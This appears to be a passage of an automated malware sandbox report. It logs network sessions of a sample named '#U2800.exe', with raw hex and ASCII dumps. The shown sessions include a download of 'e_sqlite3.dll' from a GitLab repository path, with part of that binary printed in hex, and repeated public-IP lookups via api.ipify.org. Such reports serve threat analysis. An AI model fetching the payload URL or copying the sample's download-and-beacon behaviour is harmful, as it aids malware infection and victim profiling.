                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 39
                                                                                                                                                                                                        Data Ascii: ;</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absolute;top:-9
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 61 63 69 74 79 3a 2e 34 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70 61 63 69 74 79 3a 31 5c 30 2f 3b 74 6f 70 3a 2d 34 70 78 5c 30 2f 3b 6c 65 66 74 3a 2d 36 70 78 5c 30 2f 3b 72 69
                                                                                                                                                                                                        Data Ascii: acity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacity:1\0/;top:-4px\0/;left:-6px\0/;ri
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 7a 30 6c 20 2e 67 62 74 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28
                                                                                                                                                                                                        Data Ascii: z0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb .gbts{background:url(
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a
                                                                                                                                                                                                        Data Ascii: gin-top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https:
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c
                                                                                                                                                                                                        Data Ascii: bebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-shadow:0 2px 4px rgba(0,0,
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 31 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 3b 70 61
                                                                                                                                                                                                        Data Ascii: 1px Arial,sans-serif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px Arial,sans-serif;line-height:27px;pa


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        21192.168.2.449778172.65.251.784436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:25 UTC127OUTGET /hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=false HTTP/1.1
                                                                                                                                                                                                        Host: gitlab.com
                                                                                                                                                                                                        2025-01-14 11:40:25 UTC504INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:25 GMT
                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                        Content-Length: 1780736
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        CF-Ray: 901d59e29c664401-EWR
                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Cache-Control: max-age=3600, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
                                                                                                                                                                                                        Content-Disposition: attachment; filename="e_sqlite3.dll"; filename*=UTF-8''e_sqlite3.dll
                                                                                                                                                                                                        ETag: "fc529fb92be2696af6fda5021785be60"
                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                        2025-01-14 11:40:25 UTC2134INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                                                                        Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
                                                                                                                                                                                                        2025-01-14 11:40:25 UTC500INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 4f 49 30 58 36 44 35 35 79 4f 44 48 25 32 42 45 77 58 4d 58 73 76 53 41 37 35 57 48 79 38 66 58 75 7a 30 35 56 4c 43 33 64 37 5a 63 45 4d 25 32 46 7a 53 41 73 59 4a 32 64 63 41 4a 31 4a 76 61 72 71 4e 35 51 70 6e 6f 39 4a 4c 36 72 43 52 42 7a 57 72 39 37 6a 4d 45 50 35 6a 64 73 49 6c 70 51 58 76 43 69 32 41 66 35 62 4b 58 31 4f 4f 4e 4d 45 4e 45 77 6f 5a 56 4b 6b 25 32 46 50 71 57 77 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20
                                                                                                                                                                                                        Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OI0X6D55yODH%2BEwXMXsvSA75WHy8fXuz05VLC3d7ZcEM%2FzSAsYJ2dcAJ1JvarqN5Qpno9JL6rCRBzWr97jMEP5jdsIlpQXvCi2Af5bKX1OONMENEwoZVKk%2FPqWw%3D"}],"group":"cf-nel","max_age":604800}NEL:
                                                                                                                                                                                                        2025-01-14 11:40:25 UTC969INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4e b6 df 42 0a d7 b1 11 0a d7 b1 11 0a d7 b1 11 41 af b2 10 1e d7 b1 11 41 af b4 10 99 d7 b1 11 41 af b5 10 2b d7 b1 11 41 af b0 10 09 d7 b1 11 0a d7 b0 11 83 d7 b1 11 58 a2 b4 10 2a d7 b1 11 58 a2 b5 10 04 d7 b1 11 58 a2 b2 10 00 d7 b1 11 c7 a2 b5 10 08 d7 b1 11 c7 a2 b1 10 0b d7 b1 11 c7 a2 4e 11 0b d7 b1 11 c7 a2 b3 10 0b d7 b1 11 52 69 63 68 0a d7 b1 11 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NBAAA+AX*XXNRich
                                                                                                                                                                                                        2025-01-14 11:40:25 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 89 5c 24 08 57 48 83 ec 20 48 8b 39 48 8b d9 e8 7b aa 0a 00 48 8b 4b 38 e8 82 9f 01 00 48 8b cb e8 fa 3b 01 00 83 47 58 ff 75 17 80 7f 28 00 75 11 48 8b 4f 70 48 c7 47 70 00 00 00 00 e8 fd 2d 02 00 48 8b 5c 24 30 33 c0 48 83 c4 20 5f c3 0f b6 41 08 c3 cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 49 8b d8 e8 32 a8 12 00 85 c0 75 1d 8d 48 08 e8 46 0f 0f 00 48 85 c0 74 10 33 c9 48 89 08 48 89 03 33 c0 48 83 c4 20 5b c3 b8 07 00 00 00 48 83 c4 20 5b c3 cc cc cc cc cc cc 48 83 ec 28 e8 77 3b 01 00 33 c0 48 83 c4 28 c3 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 49 8b f1 41 8b f8 48 8b da
                                                                                                                                                                                                        Data Ascii: H\$WH H9H{HK8H;GXu(uHOpHGp-H\$03H _A@SH I2uHFHt3HH3H [H [H(w;3H(H\$Ht$WH IAH
                                                                                                                                                                                                        2025-01-14 11:40:25 UTC1369INData Raw: c5 eb ca cc cc cc cc cc cc cc cc cc cc cc 48 8b c4 48 89 58 10 4c 89 40 18 55 56 57 41 54 41 55 41 56 41 57 48 83 ec 60 4c 8b 29 33 ed 0f 29 70 b8 4d 8b f0 0f 29 78 a8 8b da 44 0f 29 40 98 4c 8b e1 41 ff 45 48 44 8b fd 49 63 f9 48 89 68 08 e8 19 a5 0a 00 41 89 5c 24 0c 83 fb 01 0f 85 91 01 00 00 48 8b b4 24 c0 00 00 00 48 8b 0e e8 7b af 01 00 48 8b 1e 44 8b f5 48 8d 2d 8e 85 16 00 48 8b f8 0f b7 4b 14 83 e1 3f 0f b6 04 29 83 f8 03 75 15 33 d2 48 8b cb e8 c1 d9 02 00 0f b7 43 14 83 e0 3f 0f b6 04 28 83 f8 01 74 4e 83 f8 02 75 3c 48 8b 0e 0f b7 41 14 a8 08 74 06 f2 0f 10 01 eb 1c a8 24 74 0a 0f 57 c0 f2 48 0f 2a 01 eb 0e a8 12 74 07 e8 04 9f 09 00 eb 03 0f 57 c0 0f 28 c8 48 8b cf e8 34 e7 0e 00 85 c0 74 0d 33 db 41 c6 44 24 08 01 e9 ca 05 00 00 49 8b 8d 88
                                                                                                                                                                                                        Data Ascii: HHXL@UVWATAUAVAWH`L)3)pM)xD)@LAEHDIcHhA\$H$H{HDH-HK?)u3HC?(tNu<HAt$tWH*tW(H4t3AD$I
                                                                                                                                                                                                        2025-01-14 11:40:25 UTC1369INData Raw: f2 48 0f 2c c0 eb 10 a8 12 74 68 48 83 79 08 00 74 61 e8 3e 9a 09 00 0f 57 c0 48 b9 00 00 00 00 00 00 01 00 f2 48 0f 2a c0 f2 0f 11 44 3b 08 48 3b c1 7d 13 48 b9 00 00 00 00 00 00 ff ff 48 3b c1 0f 8f b3 00 00 00 8b 44 3b 04 83 f8 43 75 0d c7 44 3b 04 42 00 00 00 e9 9d 00 00 00 83 f8 45 0f 85 94 00 00 00 c7 44 3b 04 44 00 00 00 e9 87 00 00 00 48 c7 44 3b 08 00 00 00 00 e9 79 00 00 00 83 fa 02 75 48 4b 8b 0c f9 0f b7 41 14 a8 08 74 0c f2 0f 10 01 f2 0f 11 44 3b 08 eb 5c a8 24 74 10 0f 57 c0 f2 48 0f 2a 01 f2 0f 11 44 3b 08 eb 48 a8 12 74 0d e8 ca 99 09 00 f2 0f 11 44 3b 08 eb 37 f2 0f 11 74 3b 08 0f 28 c6 eb 2c 48 c7 44 3b 08 00 00 00 00 83 fa 05 75 0a c7 44 3b 04 40 00 00 00 eb 14 33 c0 41 80 e8 42 41 80 f8 01 0f 97 c0 83 c0 3f 89 44 3b 04 49 ff c7 48 83
                                                                                                                                                                                                        Data Ascii: H,thHyta>WHH*D;H;}HH;D;CuD;BED;DHD;yuHKAtD;\$tWH*D;HtD;7t;(,HD;uD;@3ABA?D;IH
                                                                                                                                                                                                        2025-01-14 11:40:25 UTC1369INData Raw: 50 48 33 cc e8 e3 9a 14 00 4c 8d 5c 24 60 49 8b 5b 30 49 8b 6b 40 49 8b 73 48 49 8b e3 41 5f 41 5e 41 5d 41 5c 5f c3 90 96 1e 00 00 9d 1e 00 00 a4 1e 00 00 a8 1e 00 00 af 1e 00 00 b3 1e 00 00 e3 1e 00 00 00 06 01 06 06 06 02 06 06 06 06 06 06 06 03 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 04 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 05 cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 49 8b f0 48 8b da 8b f9 e8 24 98 12 00 85 c0 0f 85 22 01 00 00 b9 88 00 00 00 e8 32 ff 0e 00 4c 8b c8 48 85 c0 0f 84 0c 01 00 00 0f 57 c0 33 c0 41 0f 11 01 41 0f 11 41 10 41 0f 11 41 20 41 0f 11 41 30 41 0f 11 41 40 41 0f 11 41 50 41 0f 11 41 60 41 0f 11 41 70 49 89 81 80 00 00 00 83 ff 01 7e 7b 48
                                                                                                                                                                                                        Data Ascii: PH3L\$`I[0Ik@IsHIA_A^A]A\_H\$Ht$WH IH$"2LHW3AAAAA AA0AA@AAPAA`AApI~{H
                                                                                                                                                                                                        2025-01-14 11:40:25 UTC1369INData Raw: 89 01 eb 30 48 8b 8c 24 88 00 00 00 48 8d 15 20 b9 16 00 4c 8b c3 e8 18 1c 0d 00 bb 01 00 00 00 48 8b 4c 24 28 48 85 c9 74 0a 49 8b 45 10 ff 15 97 1e 16 00 49 8b ce e8 b7 26 01 00 4c 8b 7c 24 30 8b c3 4c 8b 64 24 78 48 8b 7c 24 70 48 8b 6c 24 60 48 83 c4 38 41 5e 41 5d 5e 5b c3 cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b 41 18 48 8b d9 48 8b 49 20 48 8b 40 10 ff 15 4d 1e 16 00 48 8b cb e8 6d 26 01 00 33 c0 48 83 c4 20 5b c3 cc cc cc cc cc 44 8b 02 33 c9 45 85 c0 7e 24 48 8b 42 08 48 83 c0 04 80 78 01 00 74 0b 83 78 fc 00 75 05 80 38 02 74 15 ff c1 48 83 c0 0c 41 3b c8 7c e4 c7 42 28 00 00 00 00 33 c0 c3 48 8b 42 20 48 63 c9 c7 42 28 01 00 00 00 c7 04 c8 01 00 00 00 48 8b 42 20 c6 44 c8 04 01 48 b8 00 00 00 00 00 00 f0 3f 48 89 42 40 33 c0 c3 cc cc cc cc cc
                                                                                                                                                                                                        Data Ascii: 0H$H LHL$(HtIEI&L|$0Ld$xH|$pHl$`H8A^A]^[@SH HAHHI H@MHm&3H [D3E~$HBHxtxu8tHA;|B(3HB HcB(HB DH?HB@3
                                                                                                                                                                                                        2025-01-14 11:40:25 UTC1369INData Raw: c9 48 8b 7c 24 10 b8 0c 00 00 00 5b c3 4b 8d 0c 52 48 8b 44 cf 10 48 85 c0 75 0a 48 8b 44 cf 08 48 89 44 cf 10 48 85 db 48 0f 44 d8 33 c0 48 89 5c cf 08 48 8b 7c 24 10 5b c3 48 89 5c 24 08 48 8d 1d 34 a5 19 00 4c 8b da 4c 8b d3 45 33 c9 66 66 66 0f 1f 84 00 00 00 00 00 4d 8b 02 49 8b c3 4d 2b c3 0f 1f 80 00 00 00 00 0f b6 10 42 0f b6 0c 00 2b d1 75 07 48 ff c0 85 c9 75 ed 85 d2 74 15 41 ff c1 49 83 c2 18 41 83 f9 50 72 cc 33 c0 48 8b 5c 24 08 c3 4b 8d 04 49 48 8b 44 c3 08 48 8b 5c 24 08 c3 cc cc cc cc cc 40 57 48 8d 3d c7 a4 19 00 4c 8b da 41 b8 ff ff ff ff 48 85 d2 74 51 48 89 5c 24 10 45 33 c0 48 8d 1d 12 ac 19 00 4c 8b d7 0f 1f 80 00 00 00 00 4d 8b 0a 49 8b c3 4d 2b cb 0f 1f 80 00 00 00 00 0f b6 10 42 0f b6 0c 08 2b d1 75 07 48 ff c0 85 c9 75 ed 85 d2
                                                                                                                                                                                                        Data Ascii: H|$[KRHDHuHDHDHHD3H\H|$[H\$H4LLE3fffMIM+B+uHutAIAPr3H\$KIHDH\$@WH=LAHtQH\$E3HLMIM+B+uHu
                                                                                                                                                                                                        2025-01-14 11:40:25 UTC1369INData Raw: ed 6d 01 00 48 8b 8e 88 00 00 00 8b d8 e8 9f 80 01 00 83 fb 64 44 8b e0 48 8d 1d 02 d0 ff ff 75 20 48 8b 46 18 0f b6 48 6c 80 bc 19 f3 9c 16 00 05 48 8b ce 75 18 48 8b d7 e8 c3 c6 0a 00 44 8b e0 41 b8 01 00 00 00 44 89 44 24 20 eb 11 33 d2 e8 2c c4 0a 00 e9 5a 03 00 00 48 8b 7c 24 40 49 8b 0f 0f b7 51 14 8b c2 83 e0 3f 80 bc 18 30 9b 16 00 05 74 5f 0f b7 c2 a8 24 74 05 4c 8b 29 eb 40 a8 08 74 25 f2 0f 10 01 66 44 0f 2f d8 77 31 66 41 0f 2f c2 76 0c 49 bd ff ff ff ff ff ff ff 7f eb 1e f2 4c 0f 2c e8 eb 17 a8 12 74 10 48 39 69 08 74 0a e8 38 84 09 00 4c 8b e8 eb 03 4c 8b ed 49 8b d5 48 8b ce e8 35 c6 0a 00 44 8b 44 24 20 44 8b e0 45 85 e4 0f 85 da 02 00 00 41 83 fe 01 0f 8e d0 02 00 00 48 89 6c 24 28 45 85 c0 0f 85 87 00 00 00 48 8b 9e 90 00 00 00 33 d2 48
                                                                                                                                                                                                        Data Ascii: mHdDHu HFHlHuHDADD$ 3,ZH|$@IQ?0t_$tL)@t%fD/w1fA/vIL,tH9it8LLIH5DD$ DEAHl$(EH3H


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        22192.168.2.449779104.26.13.2054436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:27 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: api.ipify.org
                                                                                                                                                                                                        2025-01-14 11:40:27 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:27 GMT
                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                        Content-Length: 12
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 901d59f17a540ca6-EWR
                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1479&min_rtt=1472&rtt_var=566&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=677&delivery_rate=1908496&cwnd=221&unsent_bytes=0&cid=cc04cc45816234d0&ts=145&x=0"
                                                                                                                                                                                                        2025-01-14 11:40:27 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                                        Data Ascii: 8.46.123.189


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        23192.168.2.449780104.26.13.2054436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:28 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: api.ipify.org
                                                                                                                                                                                                        2025-01-14 11:40:28 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:28 GMT
                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                        Content-Length: 12
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 901d59f5495743df-EWR
                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1608&rtt_var=605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=677&delivery_rate=1803582&cwnd=244&unsent_bytes=0&cid=987fa1e85bd2f2ef&ts=145&x=0"
                                                                                                                                                                                                        2025-01-14 11:40:28 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                                        Data Ascii: 8.46.123.189


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        24192.168.2.449782104.26.13.2054436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:29 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: api.ipify.org
                                                                                                                                                                                                        2025-01-14 11:40:29 UTC425INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:29 GMT
                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                        Content-Length: 12
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 901d59fc6d7dc32a-EWR
                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2150&min_rtt=1530&rtt_var=1017&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=677&delivery_rate=1908496&cwnd=242&unsent_bytes=0&cid=c1ff1fc7a432721d&ts=149&x=0"
                                                                                                                                                                                                        2025-01-14 11:40:29 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                                        Data Ascii: 8.46.123.189


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
